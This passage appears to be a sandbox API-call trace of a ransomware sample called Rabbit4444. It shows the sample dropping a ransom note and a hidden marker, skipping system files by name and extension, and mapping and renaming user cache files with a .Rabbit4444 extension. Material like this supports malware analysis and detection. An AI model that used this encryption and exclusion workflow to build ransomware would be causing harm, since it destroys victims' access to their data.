ftLastAccessTime.dwLowDateTime=0xf8e9cb14, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd0656a94, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x576e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_Desktop_9[1].txt", cAlternateFileName="C_0E6D~1.TXT")) returned 0 [0069.808] FindClose (in: hFindFile=0x102a50 | out: hFindFile=0x102a50) returned 1 [0069.808] lstrcpyW (in: lpString1=0x130ec04, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0069.808] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\4\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\4\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0069.808] CreateFileMappingW (hFile=0x228, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x280 [0069.808] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0069.811] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0069.811] CloseHandle (hObject=0x280) returned 1 [0069.811] CloseHandle (hObject=0x228) returned 1 [0069.811] GetCurrentThreadId () returned 0xd98 [0069.811] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122268 [0069.811] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2" [0069.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108688 | out: hHeap=0xe0000) returned 1 [0069.811] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122260 | out: hHeap=0xe0000) returned 1 [0069.811] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2" [0069.811] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\" [0069.811] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\.BFC0E91B00AE8A0620D3" [0069.811] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\2\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x228 [0069.814] WriteFile (in: hFile=0x228, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0069.817] FlushFileBuffers (hFile=0x228) returned 1 [0070.011] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0070.011] CloseHandle (hObject=0x228) returned 1 [0070.012] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2") returned 101 [0070.012] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0070.012] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc2636207, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2636207, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf2ef9751, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102510 [0070.012] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.012] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.012] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0070.012] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0070.012] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xc2636207, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2636207, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xf2ef9751, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.012] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.012] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0070.012] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0070.012] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0070.012] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0070.012] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xf2ef9751, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xf2ef9751, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xf2ef9751, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0070.013] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.013] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0070.013] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc2636207, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2636207, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2636207, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x91, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="appcache[1].man", cAlternateFileName="APPCAC~1.MAN")) returned 1 [0070.013] lstrcmpiW (lpString1="appcache[1].man", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.013] lstrcmpiW (lpString1="appcache[1].man", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.013] lstrcmpiW (lpString1="appcache[1].man", lpString2="Rabbit4444.exe") returned -1 [0070.013] lstrcmpiW (lpString1="appcache[1].man", lpString2=".") returned 1 [0070.013] lstrcmpiW (lpString1="appcache[1].man", lpString2="..") returned 1 [0070.013] lstrcmpiW (lpString1="appcache[1].man", lpString2="windows") returned -1 [0070.013] lstrcmpiW (lpString1="appcache[1].man", lpString2="bootmgr") returned -1 [0070.013] lstrcmpiW (lpString1="appcache[1].man", lpString2="pagefile.sys") returned -1 [0070.013] lstrcmpiW (lpString1="appcache[1].man", lpString2="boot") returned -1 [0070.013] lstrcmpiW (lpString1="appcache[1].man", lpString2="ids.txt") returned -1 [0070.013] lstrcmpiW (lpString1="appcache[1].man", lpString2="NTUSER.DAT") returned -1 [0070.013] lstrcpyW (in: lpString1=0x130ec04, lpString2="appcache[1].man" | out: lpString1="appcache[1].man") returned="appcache[1].man" [0070.013] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\appcache[1].man", dwFileAttributes=0x2000) returned 1 [0070.013] lstrlenW (lpString="appcache[1].man") returned 15 [0070.013] lstrlenW (lpString="Rabbit4444") returned 10 [0070.013] lstrcmpiW (lpString1="che[1].man", lpString2="Rabbit4444") returned -1 [0070.013] lstrlenW (lpString=".dll") returned 4 [0070.013] lstrcmpiW (lpString1=".man", lpString2=".dll") returned 1 [0070.013] lstrlenW (lpString=".lnk") returned 4 [0070.013] lstrcmpiW (lpString1=".man", lpString2=".lnk") returned 1 [0070.013] lstrlenW (lpString=".ini") returned 4 [0070.013] lstrcmpiW (lpString1=".man", lpString2=".ini") returned 1 [0070.014] lstrlenW (lpString=".sys") returned 4 [0070.014] lstrcmpiW (lpString1=".man", lpString2=".sys") returned -1 [0070.014] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\appcache[1].man" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\2\\appcache[1].man"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.014] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.014] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16132523144) returned 1 [0070.015] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=145) returned 1 [0070.015] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0070.015] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0070.015] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3a0, lpName=0x0) returned 0x260 [0070.023] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3a0) returned 0x70000 [0070.024] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11b380 [0070.024] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ab0 [0070.024] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b380 | out: hHeap=0xe0000) returned 1 [0070.024] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109028 [0070.024] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11da10 [0070.024] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109028 | out: hHeap=0xe0000) returned 1 [0070.024] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da10 | out: hHeap=0xe0000) returned 1 [0070.025] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108ab0 | out: hHeap=0xe0000) returned 1 [0070.025] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16133533223) returned 1 [0070.025] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0070.025] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0070.025] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.025] CloseHandle (hObject=0x260) returned 1 [0070.025] CloseHandle (hObject=0x29c) returned 1 [0070.025] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\appcache[1].man.Rabbit4444") returned 128 [0070.025] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\appcache[1].man" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\2\\appcache[1].man"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\appcache[1].man.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\2\\appcache[1].man.rabbit4444"), dwFlags=0x1) returned 1 [0070.026] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xc2636207, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2636207, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0xc2636207, ftLastWriteTime.dwHighDateTime=0x1d32714, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="container.dat", cAlternateFileName="CONTAI~1.DAT")) returned 1 [0070.026] lstrcmpiW (lpString1="container.dat", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.026] lstrcmpiW (lpString1="container.dat", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.026] lstrcmpiW (lpString1="container.dat", lpString2="Rabbit4444.exe") returned -1 [0070.026] lstrcmpiW (lpString1="container.dat", lpString2=".") returned 1 [0070.026] lstrcmpiW (lpString1="container.dat", lpString2="..") returned 1 [0070.026] lstrcmpiW (lpString1="container.dat", lpString2="windows") returned -1 [0070.026] lstrcmpiW (lpString1="container.dat", lpString2="bootmgr") returned 1 [0070.026] lstrcmpiW (lpString1="container.dat", lpString2="pagefile.sys") returned -1 [0070.026] lstrcmpiW (lpString1="container.dat", lpString2="boot") returned 1 [0070.026] lstrcmpiW (lpString1="container.dat", lpString2="ids.txt") returned -1 [0070.027] lstrcmpiW (lpString1="container.dat", lpString2="NTUSER.DAT") returned -1 [0070.027] lstrcpyW (in: lpString1=0x130ec04, lpString2="container.dat" | out: lpString1="container.dat") returned="container.dat" [0070.027] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\container.dat", dwFileAttributes=0x2022) returned 1 [0070.031] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\container.dat", dwFileAttributes=0x2006) returned 1 [0070.031] lstrlenW (lpString="container.dat") returned 13 [0070.031] lstrlenW (lpString="Rabbit4444") returned 10 [0070.031] lstrcmpiW (lpString1="tainer.dat", lpString2="Rabbit4444") returned 1 [0070.031] lstrlenW (lpString=".dll") returned 4 [0070.031] lstrcmpiW (lpString1=".dat", lpString2=".dll") returned -1 [0070.031] lstrlenW (lpString=".lnk") returned 4 [0070.031] lstrcmpiW (lpString1=".dat", lpString2=".lnk") returned -1 [0070.031] lstrlenW (lpString=".ini") returned 4 [0070.031] lstrcmpiW (lpString1=".dat", lpString2=".ini") returned -1 [0070.031] lstrlenW (lpString=".sys") returned 4 [0070.031] lstrcmpiW (lpString1=".dat", lpString2=".sys") returned -1 [0070.031] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc2636207, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2636207, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x64ab274a, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x4760, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", cAlternateFileName="C__WIN~1.HTM")) returned 1 [0070.031] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.031] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.031] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", lpString2="Rabbit4444.exe") returned -1 [0070.031] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", lpString2=".") returned 1 [0070.031] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", lpString2="..") returned 1 [0070.031] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", lpString2="windows") returned -1 [0070.031] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", lpString2="bootmgr") returned 1 [0070.031] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", lpString2="pagefile.sys") returned -1 [0070.031] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", lpString2="boot") returned 1 [0070.031] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", lpString2="ids.txt") returned -1 [0070.031] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", lpString2="NTUSER.DAT") returned -1 [0070.031] lstrcpyW (in: lpString1=0x130ec04, lpString2="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html" | out: lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html") returned="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html" [0070.032] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html", dwFileAttributes=0x2000) returned 1 [0070.032] lstrlenW (lpString="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html") returned 87 [0070.032] lstrlenW (lpString="Rabbit4444") returned 10 [0070.032] lstrcmpiW (lpString1="BE[1].html", lpString2="Rabbit4444") returned -1 [0070.032] lstrlenW (lpString=".dll") returned 4 [0070.032] lstrcmpiW (lpString1="html", lpString2=".dll") returned 1 [0070.032] lstrlenW (lpString=".lnk") returned 4 [0070.032] lstrcmpiW (lpString1="html", lpString2=".lnk") returned 1 [0070.032] lstrlenW (lpString=".ini") returned 4 [0070.032] lstrcmpiW (lpString1="html", lpString2=".ini") returned 1 [0070.032] lstrlenW (lpString=".sys") returned 4 [0070.032] lstrcmpiW (lpString1="html", lpString2=".sys") returned 1 [0070.032] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\2\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_coobe_coobe[1].html"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0070.033] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0070.033] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=16134346689) returned 1 [0070.033] GetFileSizeEx (in: hFile=0x29c, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=18272) returned 1 [0070.033] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0070.033] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0070.033] CreateFileMappingW (hFile=0x29c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4a60, lpName=0x0) returned 0x260 [0070.035] MapViewOfFile (hFileMappingObject=0x260, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4a60) returned 0x70000 [0070.038] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x11b380 [0070.038] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108f10 [0070.038] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11b380 | out: hHeap=0xe0000) returned 1 [0070.038] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0070.038] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x11da10 [0070.038] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0070.038] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11da10 | out: hHeap=0xe0000) returned 1 [0070.038] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108f10 | out: hHeap=0xe0000) returned 1 [0070.038] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=16134887471) returned 1 [0070.038] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0070.038] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0070.038] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0070.038] CloseHandle (hObject=0x260) returned 1 [0070.039] CloseHandle (hObject=0x29c) returned 1 [0070.039] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html.Rabbit4444") returned 200 [0070.039] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\2\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_coobe_coobe[1].html"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.Windows.Cortana_cw5n1h2txyewy\\AC\\AppCache\\IE77EECT\\2\\C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_COOBE[1].html.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.windows.cortana_cw5n1h2txyewy\\ac\\appcache\\ie77eect\\2\\c__windows_systemapps_microsoft.windows.cortana_cw5n1h2txyewy_cache_coobe_coobe[1].html.rabbit4444"), dwFlags=0x1) returned 1 [0070.040] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc2636207, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xc2636207, ftLastAccessTime.dwHighDateTime=0x1d32714, ftLastWriteTime.dwLowDateTime=0x39619610, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x19c2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", cAlternateFileName="C__WIN~1.PNG")) returned 1 [0070.040] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0070.040] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0070.040] lstrcmpiW (lpString1="C__Windows_SystemApps_Microsoft.Windows.Cortana_cw5n1h2txyewy_cache_COOBE_CortanaIcon[1].png", lpString2="Rabbit4444.exe") returned -1 [0070.040] lstrcmpiW 